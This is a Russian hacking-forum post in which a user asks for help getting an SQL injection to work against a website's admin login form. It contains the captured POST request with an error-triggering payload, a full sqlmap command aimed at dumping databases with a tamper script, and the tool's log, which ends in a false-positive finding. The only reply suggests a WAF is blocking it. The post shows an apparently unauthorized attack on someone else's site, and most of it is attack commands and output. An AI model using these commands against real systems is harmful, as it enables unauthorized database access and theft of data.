03.09.2016, 01:24
|
|
Участник форума
Регистрация: 08.01.2016
Сообщений: 118
Провел на форуме:
33728
Репутация:
14
|
|
Сообщение от Sensoft
↑
Не как не могу раскрутить SQL njection через POST запрос в авторизацию
Spoiler: Фото
Spoiler: Отчёт
Код:
POST /dokument/full-manual/developers/admin/js/?errauth=blocked_30_min HTTP/1.1
Content-Length:
Content-Type: application/x-www-form-urlencoded
Referer: http://www.site.ru:80/
Cookie: SESSdc0003b8d793c3d72e49c242aa69e1d4=i8hjlikb619hfca2bb9e62qr56; _ym_uid=1472824047791009073; _ym_isad=2; _ym_visorc_2170150=w
Host: www.site.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms
Spoiler: Отчёт от мампа
Код:
sqlmap -u www.site.ru/dokument/full-manual/developers/admin/js/?errauth=blocked_30_min --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --dbs --level=2 --risk=2 --string --tamper=space2comment
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
_ -| . | | | .'| . |
___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applic
le local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
*] starting at 17:04:23
17:04:23] [INFO] testing connection to the target URL
qlmap got a 302 redirect to 'http://www.site.ru:80/BASE_PATH_HREF?errauth=blocked_30_min'. Do you want to follow? [Y/n] Y
edirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
17:04:42] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
17:04:42] [INFO] testing if the provided string is within the target URL page content
17:04:42] [WARNING] you provided '--tamper=space2comment' as the string to match, but such a string is not within the target URL raw response, sqlmap will
arry on anyway
17:04:43] [WARNING] heuristic (basic) test shows that POST parameter 'name' might not be injectable
17:04:44] [INFO] testing for SQL injection on POST parameter 'name'
17:04:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
17:05:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
17:05:18] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
17:05:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
17:05:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
17:05:37] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
17:05:41] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
17:05:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
17:05:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
17:05:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
17:06:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
17:06:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
17:06:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
17:06:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
17:06:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
17:06:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
17:06:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
17:07:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
17:07:09] [INFO] testing 'PostgreSQL error-based - Parameter replace'
17:07:09] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
17:07:10] [INFO] testing 'MySQL inline queries'
17:07:11] [INFO] testing 'PostgreSQL inline queries'
17:07:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
17:07:12] [INFO] testing 'Oracle inline queries'
17:07:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
17:07:27] [INFO] POST parameter 'name' appears to be 'MySQL > 5.0.11 stacked queries' injectable
t looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
or the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] n
17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
17:08:51] [INFO] testing 'MySQL = 5.0.12 RLIKE time-based blind'
17:08:52] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
17:08:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
17:08:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
17:09:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
17:09:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
17:09:33] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
17:09:46] [INFO] checking if the injection point on POST parameter 'name' is a false positive
17:09:47] [WARNING] false positive or unexploitable injection point detected
17:09:47] [WARNING] POST parameter 'name' is not injectable
17:09:47] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try
o rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect t
t there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
*] shutting down at 17:09:47
Помогите пожалуйста очень надо
WAF
|
|
|